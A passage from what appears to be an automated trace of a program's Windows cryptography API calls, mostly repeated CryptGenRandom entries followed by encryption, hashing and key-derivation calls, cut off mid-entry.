returned 1 [0157.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.216] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7dc8c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7dc8c*=0x100) returned 1 [0157.216] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7dc8c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7dc8c*=0x100) returned 1 [0157.216] CryptCreateHash (in: hProv=0x8e33b8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444974 | out: phHash=0x1d444974) returned 1 [0157.217] CryptHashData (hHash=0x9ad7f8, pbData=0x2d7dd10, dwDataLen=0x100, dwFlags=0x0) returned 1 [0157.217] CryptDeriveKey (in: hProv=0x8e33b8, Algid=0x6610, hBaseData=0x9ad7f8, dwFlags=0x4, phKey=0x1d444978 | 